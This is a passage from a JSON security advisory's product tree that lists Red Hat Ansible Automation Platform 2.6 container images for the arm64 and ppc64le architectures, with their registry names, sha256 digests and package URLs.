"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator\u0026tag=1785629468"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9\u0026tag=1785730469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3Ab579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-rhel9\u0026tag=1785780020"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3A63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator\u0026tag=1785774574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9\u0026tag=1785748239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Ae1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-rhel9\u0026tag=1785753568"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3Aa595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator\u0026tag=1785629524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3A660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9\u0026tag=1785756951"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9-operator@sha256%3A787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator\u0026tag=1785629735"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-service-rhel9@sha256%3A5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9\u0026tag=1785634026"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9\u0026tag=1785647559"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3Abf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9\u0026tag=1785649812"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3Ae7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9\u0026tag=1785779178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9\u0026tag=1785777436"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator\u0026tag=1785630454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9\u0026tag=1785770922"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/receptor-rhel9\u0026tag=1785632117"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3Adb407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9\u0026tag=1785773509"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Ab1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9\u0026tag=1785630119"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9\u0026tag=1785745574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-devspaces-rhel9@sha256%3Ae037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9\u0026tag=1785629819"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3Ae8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9\u0026tag=1785784320"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3Af69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9\u0026tag=1785646188"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Af5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9\u0026tag=1785775360"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Afe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator\u0026tag=1785629366"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3Ad4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9\u0026tag=1785633968"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/controller-rhel9\u0026tag=1785753810"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator\u0026tag=1785629452"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Ad0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9\u0026tag=1785633038"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3A9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator\u0026tag=1785629468"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Abf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9\u0026tag=1785730469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-rhel9\u0026tag=1785780020"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Aad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator\u0026tag=1785774574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9\u0026tag=1785748239"
}
}
},
{
